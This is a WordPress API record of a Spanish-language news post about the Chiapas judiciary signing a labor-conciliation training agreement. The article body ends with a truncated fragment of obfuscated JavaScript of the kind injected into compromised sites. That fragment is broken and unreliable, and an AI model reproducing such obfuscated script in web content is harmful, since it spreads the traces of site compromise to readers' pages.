{"id":1418,"date":"2022-04-19T23:19:39","date_gmt":"2022-04-19T23:19:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1418"},"modified":"2022-04-19T23:19:41","modified_gmt":"2022-04-19T23:19:41","slug":"comprometido-el-pje-con-el-fortalecimiento-de-las-instituciones","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1418","title":{"rendered":"Comprometido el PJE con el fortalecimiento de las Instituciones"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-19-at-5.11.50-PM-1024x766.jpeg\" alt=\"\" class=\"wp-image-1419\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-19-at-5.11.50-PM-1024x766.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-19-at-5.11.50-PM-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-19-at-5.11.50-PM-768x575.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-19-at-5.11.50-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>-Juan \u00d3scar Trinidad Palacios, abona a la capacitaci\u00f3n en materia Laboral, con la firma del convenio de colaboraci\u00f3n entre el PJE y el Centro de Conciliaci\u00f3n Laboral.<\/p>\n\n\n\n<p><br>19 de Abril del 2022. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n Profesionalizaci\u00f3n y Carrera Judicial, llev\u00f3 a cabo la firma de Convenio de Colaboraci\u00f3n Interinstitucional con el Centro de Conciliaci\u00f3n Laboral del Estado, con la finalidad de fortalecer a las instituciones, para un mejor desempe\u00f1o en el ejercicio de sus funciones, en temas de soluci\u00f3n de controversias aplicados en materia Laboral.<br>Es por ello, que en un esfuerzo de colaboraci\u00f3n institucional se anunciaron los trabajos de capacitaci\u00f3n, los cuales ser\u00e1n impartidos por el personal del Centro Estatal de Justicia Alternativa (CEJA), con la finalidad de seguir formando a las y los servidores p\u00fablicos del Centro de Conciliaci\u00f3n Laboral del Estado, reforzando los conocimientos en temas de mediaci\u00f3n, conciliaci\u00f3n y arbitraje; para facilitar a la ciudadan\u00eda el libre ejercicio de sus derechos.<br>Como parte del pres\u00eddium y en representaci\u00f3n del magistrado presidente Juan \u00d3scar Trinidad Palacios, el magistrado presidente de la Ponencia B, Guillermo Ramos P\u00e9rez dirigi\u00f3 palabras de bienvenida a todas y todos los presentes, adem\u00e1s en su mensaje resalt\u00f3 la importancia de llevar a cabo la aplicaci\u00f3n de los m\u00e9todos alternativos de soluci\u00f3n de controversias ya que abonan a la cultura de la Paz y el respeto en la entidad.<br>As\u00ed mismo, estuvieron presentes las consejeras de la Judicatura, Isela de Jes\u00fas Mart\u00ednez Flores y Mar\u00eda Itzel Ballinas Barbosa; quienes atestiguaron la celebraci\u00f3n de dicho acto donde se plasmaron las firmas correspondientes al convenio de colaboraci\u00f3n; adem\u00e1s fungieron como testigos de honor el director de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial, Pedro Farro \u00c1lvarez; as\u00ed como la directora del Centro Estatal de Justicia Alternativa, Elisheba Goldhaber Pasillas.<br>Como parte del acto protocolario, la directora general del Centro de Conciliaci\u00f3n Laboral del Estado de Chiapas, Sandra Edith Guti\u00e9rrez Ochoa; expres\u00f3 su agradecimiento y benepl\u00e1cito con estos acuerdos, que permiten adquirir conocimientos m\u00e1s espec\u00edficos, adem\u00e1s de la importancia del registro de especialistas p\u00fablicos certificados, ya que, ante los cambios en la Reforma Laboral, se necesitan implementar nuevos mecanismos y darle a la conciliaci\u00f3n una prioridad.<\/p>\n\n\n\n<p>Asistieron como invitados especiales, el director de Asuntos Jur\u00eddicos de la Secretar\u00eda de Econom\u00eda, Hermann Hopenstedt Pariente y el delegado administrativo del Centro de Conciliaci\u00f3n Laboral del Estado, Octavio Ferras Couti\u00f1o.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>-Juan \u00d3scar Trinidad Palacios, abona a la capacitaci\u00f3n en materia Laboral, con la firma del convenio de colaboraci\u00f3n entre el PJE y el Centro de Conciliaci\u00f3n Laboral. 19 de Abril del 2022. El Poder Judicial del Estado de Chiapas, a trav\u00e9s del Instituto de Formaci\u00f3n Profesionalizaci\u00f3n y Carrera Judicial, llev\u00f3 a cabo la firma de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1419,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1418","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1418","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1418"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1418\/revisions"}],"predecessor-version":[{"id":1420,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1418\/revisions\/1420"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1419"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1418"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1418"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1418"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}